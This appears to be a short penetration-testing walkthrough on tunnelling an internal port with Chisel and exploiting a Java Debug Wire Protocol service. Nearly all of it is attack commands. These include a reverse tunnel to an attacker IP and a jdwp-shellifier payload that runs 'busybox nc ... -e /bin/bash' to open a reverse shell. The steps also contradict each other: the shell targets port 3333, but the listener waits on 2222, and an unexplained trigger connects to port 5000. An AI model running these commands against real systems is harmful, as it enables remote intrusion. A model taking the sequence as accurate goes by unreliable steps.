Chisel Port Forwarding
Port Forwarding with Chisel:
When performing internal network enumeration, it's crucial to identify services running on various ports. In this case, we discovered a service running on port 8000 using the ss command:
ss -ntpluThis command lists all active listening ports along with associated processes, helping us pinpoint the internal service.
Setting Up a Port Forward with Chisel
To access the internal service remotely, we can set up a port forward using Chisel, a TCP/UDP tunneling tool that supports reverse port forwarding. This allows us to forward port 8000 from the target machine to our attack machine.
Step 1: Start the Chisel Server on the Attacker Machine
On our attacking machine, we start a Chisel server that listens on port 9000:
chisel server -p 9000 --reverseStep 2: Start the Chisel Client on the Target Machine
On the target machine, we run the following command to establish a reverse tunnel, forwarding port 8000 to our attacking machine:
./chisel client --max-retry-count 1 192.168.45.241:9000 R:8000:127.0.0.1:8000This command connects the target machine to our Chisel server and forwards port 8000 to our local system.
Using the Port Forward for Exploitation
Now that port 8000 is accessible from our attacking machine, we can utilize it for exploitation. For example, if the service running on port 8000 is a Java Debug Wire Protocol (JDWP) instance, we can use jdwp-shellifier.py to execute commands remotely:
python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "busybox nc 192.168.45.241 3333 -e /bin/bash"Step 3: Set Up a Listener for the Reverse Shell
Before triggering the exploit, we set up a netcat listener on our attack machine to catch the reverse shell:
nc -nvlp 2222Step 4: Trigger the Reverse Shell on the Target
To initiate the shell connection, we trigger an event on the target machine:
nc 127.0.0.1 5000Once executed, this should provide us with a remote shell, allowing further exploitation and post-exploitation activities.
Last updated